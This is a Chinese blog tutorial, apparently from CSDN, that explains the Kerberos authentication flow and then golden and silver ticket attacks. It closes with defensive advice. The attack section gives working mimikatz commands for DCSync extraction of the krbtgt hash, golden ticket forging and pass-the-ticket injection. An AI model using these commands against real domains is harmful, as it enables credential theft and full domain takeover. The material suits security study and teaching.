kerberos协议认证与攻击

已于 2022-08-06 10:55:17 修改
阅读量2.2k 收藏 9
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 网络安全 渗透测试
于 2022-05-07 09:43:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/124624185
版权

目录

一、kerberos简介

  1. kerberos是一种计算机网络认证协议,最初由MIT开发,他能够为网络中通信的双方提供身份验证服务,确保通信双方身份的真实性和安全性。

    微软从Windows 2000开始支持Kerberos认证机制,将kerberos作为域环境下的主要身份认证机制。
    kerberos官网:https://web.mit.edu/kerberos/

  2. kerberos角色

  • 客户端(client):想访问某个server的客户端

  • 服务端(Server):提供某种业务的服务

  • 密钥分发中心(KDC):分为两部分:

    • AS(Authentication Service):认证服务,专门用来认证客户端的身份并发放客户用于访问TGS的TGT
    • TGS(Ticket Granting Service):验证TGT,发放ST

二、kerberos认证过程

kerberos认证主要分为3阶段:

  • 第一阶段:客户端和AS交互,进行身份验证,拿到TGT
  • 第二阶段:客户端拿着TGT和TGS交互,请求ST
  • 第三阶段:客户端拿ST请求要访问的目标服务

image.png

  1. AS认证(客户端拿TGT)

image.png

  • REQ1:客户端向AS发送身份认证信息,包含:
用户密码hash加密的timestamp
未加密的用户名(user)、客户端信息(client info)等
AS验证:根据未加密的用户名查找用户对应的用户密码hash,成功解密timestamp,验证客户端通过
  • RES1:返回响应给客户端,其包含两部分内容:

(1)第一部分内容:使用用户密码hash加密的一段内容:

用于客户端和TGS间通信的Session_key(CT_SK)
TGT的有效时间

(2)第二部分内容:使用krbtgt密码hash加密的TGT:

用于客户端和TGS间通信的Session_key(CT_SK)
客户端user、client info等信息
TGT的有效时间
PAC(特权属性证书):包括客户端User的SID和Group的SID等
客户端接收AS响应:用自己密码hash解密AS的响应,得到CT_SK以及(krbtgt密码hash加密的)TGT
  1. TGS认证(客户端拿最终的ST)

image.png

  • REQ2:客户端发送包含三部分内容:
客户端会生成CT_SK加密的验证器Authenticator,含user、client info等信息
目标service(明文)
第一步拿到的krbtgt密码hash加密的TGT(未改动)
  • TGS验证1:根据客户端明文传输过来的目标服务,查看当前kerberos系统中是否存在可以被用户访问的该服务,若有用密钥将解密TGT,获得以下内容:
用于客户端和TGS间通信的Session_key(CT_SK)
客户端user、client info等信息
TGT的有效时间
  • TGS验证2:TGS使用刚刚解密拿到的CT_SK,对Authenticator进行解密,将其中的客户端信息和解密后TGT中的客户端信息进行比较,如果全部相同则认为客户端身份正确
  • RES2:返回响应给客户端,其包含两部分内容:
目标服务密码hash(service_hash)加密的ST(Servre Ticket):
客户端信息
ST有效时间
用于客户端和目标服务之间通信的CS_SK
使用CT_SK加密的内容:
ST有效时间
时间戳
用于客户端和目标服务之间通信的CS_SK
  • 客户端接收TGS响应:

image.png
使用CT_SK解密了第二部分内容,检查时间戳无误后取出其中的CS_SK准备向目标服务发起最后的请求

  1. 目标服务验证

image.png

  • REQ3:客户端发送包含两部分内容:
    使用CS_SK加密的验证器(Authenticator):主机信息和时间戳等
    客户端访问目标服务的使用Server密码加密的ST(未改动)
  • 目标服务验证客户端身份:
    目标服务用自己service_hash解密ST,获得CS_SK
    用CS_SK解密Authenticator,验证Client声明的user信息,通过认证

三、常见攻击手法

域内票据传递(PTT):

(1)黄金票据(Golden ticket)

  • 获取权限:伪造的TGT,可以获取任意Kerberos的访问权限
  • 加密方式:由krbtgt NTLM Hash 加密
    (2)白银票据(Silver ticket)
  • 获取权限:伪造的ST,只能访问指定的服务,如CIFS
  • 加密方式:由服务账号 NTLM Hash 加密

1. 黄金票据

  • 定义:可换取任意服务票据(ST)的票据授权票据(TGT)。有了金票后,就跳过AS验证,不用验证账户和密码,也不担心域管密码修改,把自己伪装成可伪造成任意用户。
  • 条件:
    • 域名称
    • 域的SID
    • 域中kbrtgt账号的密码HASH

(1)域名称可通过net config workstationsysteminfo查看
image.png
(2)在任意域用户下,执行whoami /user,拿域sid
image.png
(3)mimi获取kbrtgt密码hash:

lsadump::dcsync /domain hack.com /user:krbtgt

image.png
(4)mimi生成黄金票据:

mimikatz.exe "kerberos::golden /admin:system /domain:hack.com /sid:S-1-5-21-121511599-1252177110-38747631 /krbtgt:a61858axxxxxxxxxxxxxxxxd792f3263 /ticket:ticket.kirbi"

image.png
(5)mimi导入票据:

mimikatz # kerberos::purge 
mimikatz # kerberos::ptt ticket.kirbi

image.png
(6)拿到黄金票据后,成功创建域管

image.png

2. 白银票据

  • 定义:白银票据就是伪造的ST,只需要知道服务密码Hash就可以伪造出一个ST,但是伪造的门票只对部分服务起作用,白银票据与黄金票据利用过程类似,不再赘述。
  • 条件:
    • 域名称
    • 域的SID
    • 服务主机名
    • 服务密码hash
    • 服务名

四、安全建议

  1. 内网避免存在如ms17-010等远程命令执行和弱口令等高危漏洞,导致域控被拿下
  2. 监控TGT过期时间,如mimi默认创建TGT过期时间为10年
  3. 使用微软高级威胁分析平台(ATA),对域内异常流量和行为进行监控处理:https://docs.microsoft.com/zh-cn/advanced-threat-analytics/what-is-ata
ATpiu
关注
专栏目录
Kerberos协议分析及域服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 1077
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证复现
Kerberos协议攻击及对策研究 (2005年)
05-22
Kerberos协议是当今最重要的实用认证协议,但是它也存在着一些局限性和缺陷,文章主要分析了Kerberos协议的两种最重要的攻击:口令攻击和重放攻击,以Windows2000环境下对Kerberos协议进行的攻击为例进行了具体分析...
Kerberos认证流程
atarik@163.com
02-29 2609
第一步,账号A和KDC互相认证。 1、账号A利用哈希函数将密码转化成一把密钥,这里称它为Key-Client。 2、利用Key-Client将当前的时间戳加密,生成一个字符串。表示为“{时间戳} Key-Client”。 3、将上一步生成的字符串“{时间戳} Key-Client”、账号A的信息以及一段随机字符串发给KDC。这样就组成了Kerberos的身份认证请求AS-REQ,可以使用下面...
Kerberos认证协议详解——基础篇
最新发布
weixin_42497762的博客
09-10 1269
本文还有配套的精品资源,点击获取 简介:Kerberos是一种网络认证协议,通过第三方认证服务器实现用户与服务器之间的安全交互。本文将详细介绍Kerberos的基本原理、工作流程及其在实际应用中的重要性。文章首先介绍Kerberos的简介、工作原理和组件,然后讨论其优势、应用场景以及面临的挑战与改进。Kerberos在企业网络环境和一些软件服务中得到了广泛应用,对于网络安全...
Kerberos攻击
iteye_16188的博客
12-18 417
参考: 1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url] 2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%...
kerberos认证流程
雾饮的博客
09-29 456
① 请求KDC认证中心,使用客户端密钥加密客户端信息 ② KDC返回两个数据包给client 包1 - 使用client密钥加密会话密钥 包2 - 使用server密钥加密client相关信息以及会话密钥 ③ client请求服务端,附带两个数据包 包3 - 客户端对KDC返回的第一个数据包解密,得到会话密钥,用会话密钥加密自身信息和时间戳 包2 除此之外存在一个标识,表示是否需要进行双向验证(Mutual Authentication) ④ se...
kerberos 认证流程-理解
LINGX5的博客
08-31 446
域内的用户向 KDC(域控服务器)发送请求包,告诉域控,我要获得访问服务的票据。用户名,主机名,认证因子 Authenticator(由客户端用户 hash 加密的时间戳等信息),其他信息。
kerberos协议简介.pdf
07-11
Kerberos 协议的优点包括:提供了身份认证和加密保护、保护网络实体免受窃听和重复攻击、可以与其他安全协议集成等。 Kerberos 协议的缺点包括:需要一个可靠的第三方、需要保持时间同步和短周期的密钥更新等。 ...
三步轻松理解Kerberos协议
06-19
Kerberos协议是一种广泛应用于企业环境的身份验证协议,特别是在Active Directory (AD)域环境中,它为客户端和服务器应用提供了安全认证服务。该协议的核心在于使用对称加密技术,确保了用户身份的安全验证,防止...
Kerberos认证
简单点,编程的方式简单点
09-15 436
Kerberos是一种计算机网络认证协议,用于安全地验证用户和服务之间的身份。通过以上步骤,Kerberos认证过程完成,用户和服务之间的通信可以在安全的环境下进行。
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7125
Windows认证一般包括本地认证(NTLM HASH)和域认证kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
关于Kerberos认证的一些攻击手法学习总结
渗透测试研究中心
05-09 1154
Kerberos认证流程前言本文主要分享最近学习的关于域内Kerberos认证的一些攻击手法,以自我的理解为主,从原理理解切入到基本工具利用来阐述,个人的理解分析较为啰嗦,嫌太兀长的可以跳着看就好,还请各位谅解。如有错误,请师傅们提出更正对于Kerberos认证流程只是简单的描述带过,下面有很多细节没有说明,比如PAC,S4U2SELF(委派),S4U2PROXY(委派)等。详细的解读推荐翻阅d...
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 560
上篇文章介绍了kerberos协议认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取域管理员密码首先再来回顾一下Kerberoast协议认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
详细讲解kerberos认证全过程、黄金、白银票据
qq_63217130的博客
08-18 2771
当TGS接收到请求之后,会检查自身是否存在客户端请求的服务,如果存在就会拿ktbtgt hash解密TGT(由于TGS是在DC上的,所有具有krbtgt的hash),解密到的信息中包含了login session key,别忘了客户端发过来的时间戳就是利用login session key加密的,此时就可以用其解密获取到时间戳了,然后验证时间戳。只要在TGT过期之前,可以直接请求TGS申请服务票据,而不用在每次访问服务的时候都向AS请求TGT,减少了与AS的通信,提高了系统的性能和效率。
域渗透——Kerberos委派攻击
whojoe的博客
07-12 1509
域渗透——Kerberos委派攻击前言环境搭建创建非约束委派账户创建约束委派账户发现域内委派的用户和计算机ldapsearch查找非约束用户查找非约束机器查找约束用户查找约束机器ADfind查找非约束委派用户查找非约束委派主机查找约束委派用户查找非约束委派主机PowerView查找非约束委派用户查找非约束委派主机查找约束委派用户查找约束委派主机非约束委派的利用触发约束委派的利用利用防御参考文章 前言 本文章重点说一下约束委派和非约束委派,,这里的非约束委派需要手动触发比较鸡肋,可以使用非约束委派账户配合pr
内网横向移动—Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 1123
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
Kerberos协议详解:安全认证与密钥管理
Kerberos协议是一种在不安全网络环境下提供身份验证服务的安全机制,其核心目标是在用户、服务器以及认证中心(Kerberos Key Distribution Center, KDC)之间建立信任关系,确保数据传输的安全性。以下是Kerberos...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值